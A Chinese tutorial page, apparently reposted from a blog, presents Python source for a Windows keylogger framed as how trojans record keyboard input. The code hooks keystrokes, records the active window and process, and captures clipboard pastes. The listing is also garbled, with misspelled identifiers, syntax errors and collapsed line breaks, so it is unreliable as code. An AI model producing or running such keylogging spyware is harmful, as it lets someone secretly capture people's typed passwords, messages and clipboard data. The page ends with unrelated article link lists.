python编写计算机病毒教程(Python告诉你木马程序的键盘记录原理)
类别:脚本大全 浏览量:1800
时间:2022-04-01 01:28:11 python编写计算机病毒教程
Python告诉你木马程序的键盘记录原理前言
Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓"人生苦短,快用Python"。
|
# -*- coding: utf-8 -*- from ctypes inport import pythoncom import pyHook import win32clipboard user32 = winddll.user32 kernel32 = windll.kernel32 psapi = windll.psapi current_window = Note def get_current_process(): #获取最上层的窗句柄 hwnd = user32.GetForegroundWindow() #获取进程ID pid = c_ulong( 0 ) user32. GetwindowThreadProcessId(hwnd,byref(pid)) #将进程ID存入变量中 process_ = "%d" % pid.value #申请内存 executable = create_string_buffer( "\x00" * 522 ) h_process = kernel32.OpenProcess( 0x400 | 0x10 , False ,pid) psapi.GetModuleBaseNameA(h_process, None ,byref(executable), 512 ) #读取窗口标题 windows_title = create_string_buffer( "\x00" , 512 ) length = user32.GetWindowTextA(hwnd,byref(windows.title), 512 ) #打印 print print "[PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value) print #关闭handles kernel32.CloseHandle(hwnd) kernel32.CloseHandle(h_process) #关闭键盘监听事件函数 def KeyStroke(event): global current_window #检测目标窗口是否转移(换了其他窗口就监听新窗口) if event,WindowName ! = current_window: current_window = event.WindowName #函数调用 get_current_process() #检测击键是否常规按键(非组合键等) if event.Ascii> 32 and enent .Ascii < 127 : print chr (event.Ascii), else : #如果发现ctrl + V事件,就粘贴板内容记录下来 if event.Key = = "V" win32clipboard.OpenClipdoard() pasted_value = win32clipdoard. GetClipdoardData() win32clipdoard.CloseClipboard() print "[PASTE]-%s" % (pasted_value), else : print "[%s]" % event.Key, 循环监听下一个事件 return True #创建并注册hook管理器 kl = pyHook.HookManager() kl.KeyDown = KeyStroke #注册hook并兴趣 kl.hookKeyboard() pythoncom.PumpMessages() |
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对开心学习网的支持。如果你想了解更多相关内容请查看下面相关链接
原文链接:https://blog.csdn.net/qq_39363022/article/details/86709553
您可能感兴趣
- python 模式识别(python实现全盘扫描搜索功能的方法)
- 使用python编辑个人名片(python实现名片管理系统项目)
- python 常用模块函数(Python OOP类中的几种函数或方法总结)
- python线程池有几种(对python 多线程中的守护线程与join的用法详解)
- python电脑自动发送邮件(python学习--使用QQ邮箱发送邮件代码实例)
- python中if条件语句如何使用(Python中如何使用if语句处理列表实例代码)
- python操作mysql连接池(详解Python连接MySQL数据库的多种方式)
- python列表中的数组(Python3.4学习笔记之列表、数组操作示例)
- python虚拟变量教程(Python中psutil的介绍与用法)
- python怎么用pandas读取两列数据(python 利用pandas将arff文件转csv文件的方法)
- python变量与对象的关系(Python面向对象程序设计类变量与成员变量、类方法与成员方法用法分析)
- python模块学习之random模块(详解Python基础random模块随机数的生成)
- python二叉树是怎么来的(Python二叉树的镜像转换实现方法示例)
- python将网站图片本地存储(详解Python下载图片并保存本地的两种方式)
- pythonselenium自动选框(python selenium 弹出框处理的实现)
- python字符处理的函数(Python字符串内置函数功能与用法总结)
- 美国数十万加仑牛奶倒下水道怎么回事 原因曝光令人心痛(美国数十万加仑牛奶倒下水道怎么回事)
- 探索中国神秘文字(探索中国神秘文字)
- 重温《蜗居》 宋思明选中海藻为红颜知己,纯属巧合,与爱无关(宋思明选中海藻为红颜知己)
- 越南旅游攻略(越南旅游攻略自由行)
- 成都旅游攻略(成都旅游攻略自由行最佳线路)
- 给儿童吃什么最好(给儿童吃什么最好消化)
热门推荐
- python教程列表排序(Python一行代码实现快速排序的方法)
- sqlcount优化(SQL优化教程之in与range查询)
- 如何估算项目的开发时间
- svn冲突怎么解决
- SQL Server中查询CPU占用高的SQL语句
- .Net中Immutable(不可变)集合
- nodejs登录案例(利用Node.js创建一个密码生成器的全步骤)
- python json转换字符串(python3 json数据格式的转换dumps/loads的使用、dict to str/str to dict、json字符串/字典)
- dedecms标签调用原理(DEDECMS栏目页开伪静态的方法apache服务器)
- navicat配置远程访问mysql(解决Navicat无法连接 VMware中Centos系统中的 MySQL服务器的问题)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9